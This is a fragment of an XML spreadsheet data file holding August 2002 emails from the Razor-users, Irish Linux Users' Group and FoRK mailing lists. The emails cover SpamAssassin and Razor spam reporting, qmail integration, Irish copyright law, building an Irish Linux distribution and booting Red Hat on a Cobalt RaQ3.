    <t>On Tue, 13 Aug 2002, David Raistrick wrote:\n\n&gt; On Tue, 13 Aug 2002, Patrick wrote:\n&gt;\n&gt; &gt; On Tue, 13 Aug 2002, Justin Shore wrote:\n&gt; &gt;\n&gt; &gt; &gt; I'm assuming I need to strip the SpamAssassinReport.txt attachments\n&gt; &gt; &gt; from my spam mailbox before I run the mailbox through razor-report,\n&gt; &gt; &gt; correct?  Does anyone know of an easy way to do this?\n&gt; &gt;\n&gt; &gt; man spamassassin\n&gt;\n&gt;\n&gt; To actually answer Justin's question, (one can assume that he has\n&gt; rewrite_subject and report_header turned on because he wants them..and\n&gt; that he would like to be able to strip the added bits off before he sends\n&gt; them to razor) something as simple as the following would probably work\n&gt; just fine.  Just pipe your message through this, then on into\n&gt; razor-report:\n&gt;\n&gt; grep -v "SPAM:" | sed 's/Subject: \*\*\*\*\*SPAM\*\*\*\*\* /Subject: /'\n\nWhy not just use spamassassin -r?\n\n\n       -r, --report\n           Report this message as verified spam.  This will sub-\n           mit the mail message read from STDIN to various spam-\n           blocker databases, such as Vipul's Razor (\n           [URL]http://razor.sourceforge.net[/URL] ) and the Distributed\n           Checksum Clearinghouse ( [URL]http://www.rhyolite.com[/URL]\n           spam/dcc/ ).\n\n           If the message contains SpamAssassin markup, this will\n           be stripped out automatically before submission.\n\n\n/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\n                               Patrick Greenwell\n         Asking the wrong questions is the leading cause of wrong answers\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Dice - The leading online job board\nfor high-tech professionals. Search and apply for tech jobs today!\n[URL]http://seeker.dice.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://razor.sourceforge.net http://www.rhyolite.com http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: Waider &lt;waider@waider.ie&gt;\nDate: Tue, 13 Aug 2002 10:59:55 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:59:55 +0100</t>
  </si>
  <si>
    <t>[ILUG] Irish Copyright Law: some analyses</t>
  </si>
  <si>
    <t>Two interesting analyses of the Irish implementation of copyright as led by, as\nbest I can tell, anticipation of the EUCD (since the Irish law was passed in\n2000, and the EUCD is somewhat more recent than that). The pieces of interest\nare the papers by Prof. Robert Clark, who perhaps might not be a bad choice of\nspeaker for some future LUG gathering. One of the more eye-opening comments in\nthe second of his papers is that Irish legislation is, in effect, more\ndraconian than the DMCA.\n\n[URL]http://www.cai.ie[/URL]\n\nThere are some other interesting pieces here, too, for anyone concerned about\ncopyright and the like in Ireland.\n\nCheers,\nWaider. Props to Danny at NTK ([URL]www.ntk.net[/URL] for the link.\n-- \nwaider@waider.ie / Yes, it /is/ very personal of me.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.cai.ie www.ntk.net http://www.linux.ie</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Russell Turpin" &lt;deafbox@hotmail.com&gt;\nDate: Tue, 13 Aug 2002 10:53:57 +0000</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:53:57 +0000</t>
  </si>
  <si>
    <t>Re: NYTimes.com Article: Bigger Bar Code Inches Up on Retailers</t>
  </si>
  <si>
    <t>Gojomo:\n&gt;How about a highly error corrected atomic level 3D encoding scheme that \n&gt;relies on shape, colour and chemical make up to uniquely identify every \n&gt;object in the universe. Objects uniquely identify themselves - theres no \n&gt;need for barcodes.\n\nThat might work easily enough for reasonably rigid\nsolids that can be positioned and fingerprinted. I\nthink it would be more difficult for other items.\nLike a sweater. The exact pattern of threads is never\nquite the same, with the loose weave and all. The\nproblem of automatically capturing any object's look,\nadequately to uniquely identifying it later, is still\nopen research.\n\n\n\n_________________________________________________________________\nSend and receive Hotmail on your mobile device: [URL]http://mobile.msn.com[/URL]\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Michael J Humphries" &lt;adminmjh@alphacomm.net&gt;\nDate: Tue, 13 Aug 2002 10:36:14 -0500</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:36:14 -0500</t>
  </si>
  <si>
    <t>"Michael J Humphries" &lt;adminmjh@alphacomm.net&gt;</t>
  </si>
  <si>
    <t>RE: [Razor-users] FW: intigration with qmail</t>
  </si>
  <si>
    <t>Thank you for your response I will verify that I have taken these steps that you have metioned but as well I would like to stop mail from entering my mail boxes and need the info about how to integrate with qmail in newbie terms if that is possible.  Thank you again for your help Michael Humphries Alphacomm.net Network Administrator 906-639-3500 877-450-3500 adminmjh@alphacomm.net [URL]www.alphacomm.net[/URL]  -----Original Message----- From: razor-users-admin@example.sourceforge.net [mailto:razor-users-admin@lists.sourceforge.net] On Behalf Of Daniel Higgins Sent: Tuesday, August 13, 2002 10:15 AM To: razor-users@example.sourceforge.net Subject: Re: [Razor-users] FW: intigration with qmail i don't think you get exactly what razor does. razor is used to stop spam from entering a mail box, not to leave a mail server. altough you could probably use it that way i doubt it would do much good (if the mail is leaving the server, it most likely is a new spam and wouldn`t get caught by razor) you might want to look into dealing with those troublesome users directly. and (as you`ve probably been screamed at a lot of times) close your open relay if you have one, there are plenty of sites that tells you how (most RBL sites) -- Daniel Higgins Netcommunications Inc. Administrateur Systme / Network Administrator Tel: 450-346-3401 Fax: 450-346-3587 dhiggins@netc.net [URL]http://www.netc.net[/URL] ----- Original Message ----- From: "Michael J Humphries"  To:  Sent: Tuesday, August 13, 2002 10:44 AM Subject: [Razor-users] FW: intigration with qmail &gt; I sent this message already and I am sorry if I am asking the wrong &gt; question or if I have been asking stupid questions but I am in an urgent &gt; time when people are using my service to spam others and I NEED to stop &gt; them quickly. I hope that some one can help if not please just let me &gt; know that I have been asking the bad questions or I need to be in a &gt; different list serv.  Thank you all so much for your time &gt; &gt; Michael Humphries &gt; Alphacomm.net &gt; Network Administrator &gt; 906-639-3500 &gt; 877-450-3500 &gt; adminmjh@alphacomm.net &gt; [URL]www.alphacomm.net[/URL] &gt; &gt; &gt; -----Original Message----- &gt; From: Michael J Humphries [mailto:adminmjh@alphacomm.net] &gt; Sent: Friday, August 09, 2002 2:25 PM &gt; To: 'razor-users@example.sourceforge.net' &gt; Subject: intigration with qmail &gt; &gt; i have Redhat 7.2 and qmail 1.0.2 and vpopmail 5.3.8 I am tring to &gt; intigrate the -revoke -check etc.. and can not find where to do so I &gt; only found the procmail example. Is there a place I can find this &gt; information or has someone already run into this and found the way to &gt; get this done &gt; &gt; Michael Humphries &gt; Alphacomm.net &gt; Network Administrator &gt; 906-639-3500 &gt; 877-450-3500 &gt; adminmjh@alphacomm.net &gt; [URL]www.alphacomm.net[/URL] &gt; &gt; &gt; &gt; &gt; &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by: Dice - The leading online job board &gt; for high-tech professionals. Search and apply for tech jobs today! &gt; [URL]http://seeker.dice.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] &gt; ------------------------------------------------------- This sf.net email is sponsored by: Dice - The leading online job board for high-tech professionals. Search and apply for tech jobs today! [URL]http://seeker.dice.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL] ------------------------------------------------------- This sf.net email is sponsored by: Dice - The leading online job board for high-tech professionals. Search and apply for tech jobs today! [URL]http://seeker.dice.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>www.alphacomm.net http://www.netc.net www.alphacomm.net www.alphacomm.net http://seeker.dice.com https://lists.sourceforge.net http://seeker.dice.com https://lists.sourceforge.net http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Tue, 13 Aug 2002 10:33:43 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:33:43 +0100</t>
  </si>
  <si>
    <t>&gt; &gt; hmm, I've never used gentoo\n&gt; &gt; so I'll have to take your word\n&gt; &gt; on that.  Perhaps something\n&gt; &gt; similar to that Ximian RedHat\n&gt; &gt; dealy would be cool.  Like\n&gt; &gt; a gui installer for slackware![1]\n&gt; &gt;\n&gt; &gt; ;]\n&gt; &gt;\n&gt; &gt; shane\n&gt; &gt;\n&gt; &gt; [1]I'm shure Patrick V. would love\n&gt; &gt; that.(not)\n&gt; \n&gt; Or slackware with ports... not portage.\n\nWhere ports==FreeBSD like and portage==Gentoo style, perhaps some would\nregard that as a retrograde step.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie, iiu@taint.org\nFrom: Chris Higgins &lt;chris.higgins@hts.horizon.ie&gt;\nDate: Tue, 13 Aug 2002 10:32:20 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:32:20 +0100</t>
  </si>
  <si>
    <t>Chris Higgins &lt;chris.higgins@hts.horizon.ie&gt;</t>
  </si>
  <si>
    <t>ilug@linux.ie, iiu@taint.org</t>
  </si>
  <si>
    <t>[ILUG] Ireland's hub just moved further away from the internet.</t>
  </si>
  <si>
    <t>Anyone notice that Esat have started routing most of\ntheir traffic through Concert...  I've just had my\nfirst &gt;32hop traceroute since the 1995(ish)\n\nSo much for being at the heart of the Internet !\n\n--\n\nChris Higgins\nHorizon\ne: chris.higgins at hts.horizon.ie\ntel: +353-1-6204900\nfax: +353-1-6204901\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Tue, 13 Aug 2002 10:30:17 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:30:17 +0100</t>
  </si>
  <si>
    <t>&gt; hmm, I've never used gentoo\n&gt; so I'll have to take your word\n&gt; on that.  Perhaps something\n&gt; similar to that Ximian RedHat\n&gt; dealy would be cool.  Like\n&gt; a gui installer for slackware![1]\n&gt; \n&gt; ;]\n&gt; \n&gt; shane\n&gt; \n&gt; [1]I'm shure Patrick V. would love\n&gt; that.(not)\n\nOr slackware with ports... not portage.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: Waider &lt;waider@waider.ie&gt;\nDate: Tue, 13 Aug 2002 10:27:01 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:27:01 +0100</t>
  </si>
  <si>
    <t>On 13.08.2002 at 08:42:44, "John P. Looney"  wrote: &gt;  Vendors wrote their own wierd-ass installers &amp; config tools to lock &gt; people to their OS, they added all sorts of functionality that was not &gt; availible to other OSes to make themselves different from the competition &gt; (Motif on non-free OSes, incompatible filesystems etc). Not sure Motif is a good example, really. When Mozilla was going through its "Let's Use Motif/Let's Not" phase, Jamie Zawinski mentioned in passing that the installed base of Motif-bearing systems kicked the installed base of Linux-bearing systems into a huddled ball. Something, perhaps, to do with the fact that every Sun/Solaris box since version mumble shipped with it, plus every HP/UX box, and for all I know every other mainstream proprietary Linux. Motif was more a unifier across Unix subspecies than a differentiator. Now, filenames longer than 14 characters, maybe, or the options for ps (are we sysv or bsd?), or the whole /dev tree, or the libc implementation... Cheers, Waider. --  waider@waider.ie / Yes, it /is/ very personal of me. --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Tue, 13 Aug 2002 10:19:53 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:19:53 +0100</t>
  </si>
  <si>
    <t>[ILUG] SUSE 8 disks? (thread changed slightly)</t>
  </si>
  <si>
    <t>&gt; I don't discount any other work like for\n &gt; example Niall's work on the B.B.C. but maybe\n &gt; there is general interest in an Irish distro.\n &gt; Anyone?\n \n I'll bite.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "kevin lyda" &lt;kevin+dated+1029661657.64143c@ie.suberic.net&gt;\nFrom: "Ryan, Shane" &lt;Shane_Ryan@education.gov.ie&gt;\nDate: Tue, 13 Aug 2002 10:15:31 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:15:31 +0100</t>
  </si>
  <si>
    <t>"Ryan, Shane" &lt;Shane_Ryan@education.gov.ie&gt;</t>
  </si>
  <si>
    <t>"kevin lyda" &lt;kevin+dated+1029661657.64143c@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>bugger, lost the url to that\nsite/tarball in question. I have\nit on a cd somewhere though.\nthe bblcd toolkit is similar\nbut is for building a cd-based\ndistro.[1]\n\nshane\n\n[1]*this time*\n[URL]http://www.bablokb.de[/URL]\n\n-----Original Message-----\nFrom: kevin lyda [mailto:kevin+dated+1029661657.64143c@ie.suberic.net]\nSent: 13 August 2002 10:08\nTo: ilug@linux.ie\nSubject: Re: [ILUG] SUSE 8 disks? (thread changed slightly)\n\n\nOn Tue, Aug 13, 2002 at 09:55:49AM +0100, Ryan, Shane wrote:\n&gt; distro.  There's even a tarball[1] with this\n\nsegfault.  core dumped.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.bablokb.de http://www.linux.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "Ryan, Shane" &lt;Shane_Ryan@education.gov.ie&gt;, &lt;ilug@linux.ie&gt;\nFrom: "Matthew French" &lt;mfrench42@yahoo.co.uk&gt;\nDate: Tue, 13 Aug 2002 10:15:11 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:15:11 +0100</t>
  </si>
  <si>
    <t>"Ryan, Shane" &lt;Shane_Ryan@education.gov.ie&gt;, &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>Shane Ryan asked:\n&gt; ...but maybe there is general interest in\n&gt; an Irish distro.\n\nI have my own thoughts on this, and would be very keen to create yet another\nnew (and different) distro.\n\nOf course, it would require a minimum of EUR300,000 in funding, which is the\nreason I have not started this project myself... :(\n\n- Matthew\n\n\n__________________________________________________\nDo You Yahoo!?\nEverything you'll ever need on one web page\nfrom News and Sport to Email and Music Charts\n[URL]http://uk.my.yahoo.com[/URL]\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Ryan, Shane" &lt;Shane_Ryan@education.gov.ie&gt;\nDate: Tue, 13 Aug 2002 10:08:38 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:08:38 +0100</t>
  </si>
  <si>
    <t>hmm, I've never used gentoo\nso I'll have to take your word\non that.  Perhaps something \nsimilar to that Ximian RedHat\ndealy would be cool.  Like\na gui installer for slackware![1]\n\n;]\n\nshane\n\n[1]I'm shure Patrick V. would love\nthat.(not)\n\n-----Original Message-----\nFrom: John P. Looney [mailto:valen@tuatha.org]\nSent: 13 August 2002 10:01\nTo: ilug@linux.ie\nSubject: Re: [ILUG] SUSE 8 disks? (thread changed slightly)\n\n\nOn Tue, Aug 13, 2002 at 09:55:49AM +0100, Ryan, Shane mentioned:\n&gt; It *is* a good idea though.  I've been \n&gt; wondering about the same thing for a couple\n&gt; of months now but always considered it too\n&gt; complicated to carry out. (If that makes any\n&gt; sense at all).\n\n It is to complex. Look at the mess that is gentoo. Just because you can\ndo something, doesn't mean you should.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 13 Aug 2002 10:07:44 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:07:44 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] RH7.3 on Cobalt - the saga continues</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 10:04:55AM +0100, Padraig Brady mentioned:\n&gt; [URL]http://list.cobalt.com[/URL]\n\n That isn't the problem - I've flashed the raq3 with the 2.3.40 PROM, a\nbeta one, required to get the 2.4 kernel's booting.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://list.cobalt.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Matthew French" &lt;mfrench42@yahoo.co.uk&gt;\nDate: Tue, 13 Aug 2002 10:07:43 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:07:43 +0100</t>
  </si>
  <si>
    <t>Kate P Looney wrote:\n&gt; Vendors wrote their own wierd-ass installers &amp; config tools to lock\n&gt; people to their OS, they added all sorts of functionality that was not\n&gt; availible to other OSes to make themselves different from the competition\n\nI think the words you are looking for are "competitive advantage" or\n"differentiation".\n\nSince most Linux vendors are businesses, they need to make money to\nsurvive[1]. To make money they need to sell products. To ensure they sell\ntheir product, they must provide something that other vendors do not.\n\nThe down side is that this produces many variations of the same product. The\nbenefit of open source is that there is a common standard which everyone can\nshare. (The up side is that the competition drives the different\norganisations to constantly improve their product offering[2].)\n\nSo unlike SunOS vs AIX vs HPUX vs Tru64, where the API's and available\nfunctionality were often starkly different, Linux distributions are mostly\nthe same.\n\nWhile I may have to look in /var/named on Red Hat, and /etc/bind on Debian,\nthe binaries are basically the same, as are the man pages. In most cases,\ndoing a "man named" will reveal the compiled location of the config files.\nSo long as this is understood, it is easy enough to administer most Linux\ndistributions.\n\nI expect that as companies and public sector organisations begin to\nunderstand the open source paradigm, you will find even more distributions\nappearing. The reason I believe this is that deriving a new distribution\nfrom, say, Debian requires comparatively little effort. I would see this\nrequiring slightly more effort than the amount of time many enterprise\nadmins spend trying to customise the desktops, screen savers and software\ndistribution mechanisms of their own organisations.\n\nIMHO, as always...\n\n\n- Matthew\n\n[1] Depending on your world view, this may be rephrased as "they need to\nmake oodles of profits and screw the little man to survive." This discussion\nis beyond the scope of this list. :)\n\n[2] The often overlooked problem with competition is that it weakens the\n"combatants", leaving the field open for a less powerful force to take over\nand entrench its position (in this case I would be referring to Microsoft).\nHowever, I do not believe this will effect the Linux movement as all the\nvendors are obliged to work together to a great degree, thanks to the GPL.\n\n\n\n__________________________________________________\nDo You Yahoo!?\nEverything you'll ever need on one web page\nfrom News and Sport to Email and Music Charts\n[URL]http://uk.my.yahoo.com[/URL]\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: kevin lyda &lt;kevin+dated+1029661657.64143c@ie.suberic.net&gt;\nDate: Tue, 13 Aug 2002 10:07:32 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:07:32 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1029661657.64143c@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 09:55:49AM +0100, Ryan, Shane wrote:\n&gt; distro.  There's even a tarball[1] with this\n\nsegfault.  core dumped.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Damian O' Sullivan" &lt;Damian.OSullivan@bcs.ie&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 13 Aug 2002 10:06:29 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:06:29 +0100</t>
  </si>
  <si>
    <t>"Damian O' Sullivan" &lt;Damian.OSullivan@bcs.ie&gt;</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 10:03:14AM +0100, Damian O' Sullivan mentioned:\n&gt; But how did you get to the prom on it? I have an assortment of qubes and\n&gt; raqs here and they have lcd displays but I see no way of entering commands\n&gt; that way. You using a serial cable or something?\n\n Yep.\n\n Power on the box while pushing the recessed button near the LCD with a\npaper clip. On the serial console, you'll see "press space to enter the\nprom".\n\n It's a crap prom, but a prom, nonetheless.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Tue, 13 Aug 2002 10:04:55 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:04:55 +0100</t>
  </si>
  <si>
    <t>John P. Looney wrote:\n&gt; On Tue, Aug 13, 2002 at 09:53:55AM +0100, Damian O' Sullivan mentioned:\n&gt; \n&gt;&gt;&gt; Curiously, when I go into the boot prom, an use\n&gt;&gt;&gt; "set_params" I can tell it to mount /dev/hda2 as root. But \n&gt;&gt;&gt;then it uses the PROM copy of the kernel (dodgy 2.2.16 \n&gt;&gt;&gt;kernel), which doesn't know ext3, so wants to fsck up my disk.\n&gt;&gt;\n&gt;&gt;Boot prom on a cobalt? Is this an old mips based one? How did you get to it?\n\nserial I would guess\n\n&gt; \n&gt;  This is actually a raq3. Though, I do have an old raq2 that Liam was\n&gt; helping me get netbsd on (about all you'll get on a 16MB machine these\n&gt; days).\n&gt; \n&gt;  Anyway, I wussed out, and copied hda1:/ to hda2:/boot and set the bootfs\n&gt; to be hda2. It worked, though it's mounting an ext3fs as ext2. But I'm\n&gt; getting there.\n&gt; \n\n[URL]http://list.cobalt.com[/URL]\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Damian O' Sullivan" &lt;Damian.OSullivan@bcs.ie&gt;\nDate: Tue, 13 Aug 2002 10:03:14 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:03:14 +0100</t>
  </si>
  <si>
    <t>RE: [ILUG] RH7.3 on Cobalt - the saga continues</t>
  </si>
  <si>
    <t>But how did you get to the prom on it? I have an assortment of qubes and\nraqs here and they have lcd displays but I see no way of entering commands\nthat way. You using a serial cable or something?\n\n&gt;  This is actually a raq3. Though, I do have an old raq2 that \n&gt; Liam was helping me get netbsd on (about all you'll get on a \n&gt; 16MB machine these days).\n&gt; \n&gt;  Anyway, I wussed out, and copied hda1:/ to hda2:/boot and \n&gt; set the bootfs to be hda2. It worked, though it's mounting an \n&gt; ext3fs as ext2. But I'm getting there.\n&gt; \n&gt; Kate\n&gt; \n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 13 Aug 2002 10:01:17 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 10:01:17 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 09:55:49AM +0100, Ryan, Shane mentioned:\n&gt; It *is* a good idea though.  I've been \n&gt; wondering about the same thing for a couple\n&gt; of months now but always considered it too\n&gt; complicated to carry out. (If that makes any\n&gt; sense at all).\n\n It is to complex. Look at the mess that is gentoo. Just because you can\ndo something, doesn't mean you should.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Damian O' Sullivan" &lt;Damian.OSullivan@bcs.ie&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 13 Aug 2002 09:57:41 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 09:57:41 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 09:53:55AM +0100, Damian O' Sullivan mentioned:\n&gt; &gt;  Curiously, when I go into the boot prom, an use\n&gt; &gt;  "set_params" I can tell it to mount /dev/hda2 as root. But \n&gt; &gt; then it uses the PROM copy of the kernel (dodgy 2.2.16 \n&gt; &gt; kernel), which doesn't know ext3, so wants to fsck up my disk.\n&gt; Boot prom on a cobalt? Is this an old mips based one? How did you get to it?\n\n This is actually a raq3. Though, I do have an old raq2 that Liam was\nhelping me get netbsd on (about all you'll get on a 16MB machine these\ndays).\n\n Anyway, I wussed out, and copied hda1:/ to hda2:/boot and set the bootfs\nto be hda2. It worked, though it's mounting an ext3fs as ext2. But I'm\ngetting there.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "wintermute" &lt;cout@eircom.net&gt;\nFrom: "Ryan, Shane" &lt;Shane_Ryan@education.gov.ie&gt;\nDate: Tue, 13 Aug 2002 09:55:49 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 09:55:49 +0100</t>
  </si>
  <si>
    <t>hey, AFAIK it isn't hard at all to create your own modified version of the redhat distro.  There's even a tarball[1] with this specifically in mind.  The people who built the Ximian version of RedHat used a system similar to said tarball. Building a distro which uses a *BSD ports system rather than rpm, deb or whatever would complicate things a tad more IMHO. It *is* a good idea though.  I've been  wondering about the same thing for a couple of months now but always considered it too complicated to carry out. (If that makes any sense at all). I don't discount any other work like for  example Niall's work on the B.B.C. but maybe there is general interest in an Irish distro. Anyone? Regards, Shane. -----Original Message----- From: wintermute [mailto:cout@eircom.net] Sent: 13 August 2002 00:48 To: ilug@linux.ie Subject: Re: [ILUG] SUSE 8 disks? (thread changed slightly) Rick Moen  wrote: &gt; Don't like SuSE's product licensing?  Write your own distribution.  You &gt; can even grab most of what you need _from SuSE_.  All you have to do is  &gt; heed the licensing terms on the individual pieces. How unimaginably difficult is this to do? There are as far as I know, no Linux kernel hackers, nor distros that originate from this fair island right? Right. Yes it might be very,very difficult and subject to abject failure  in sticking together a distro.... call it Dolmen Linux (or other),  no doubt the packaging system would be one of the first places  such a suggestion would stumble. Some (like me) favouring a FreeBSD style ports system others favouring  a Debian style system and others still favouring *rpm style packaging. That said other *LUG have done interesting things like making blackbox. Perhaps making a distro would be ..... umm.... fun. Just a pseudo random thought. I'm only laughing on the outside  My smile is just skin deep  If you could see inside I'm really crying  You might join me for a weep. &lt;&gt; --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Damian O' Sullivan" &lt;Damian.OSullivan@bcs.ie&gt;\nDate: Tue, 13 Aug 2002 09:53:55 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 09:53:55 +0100</t>
  </si>
  <si>
    <t>&gt;  Curiously, when I go into the boot prom, an use\n&gt; \n&gt;  "set_params" I can tell it to mount /dev/hda2 as root. But \n&gt; then it uses the PROM copy of the kernel (dodgy 2.2.16 \n&gt; kernel), which doesn't know ext3, so wants to fsck up my disk.\n\nBoot prom on a cobalt? Is this an old mips based one? How did you get to it?\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
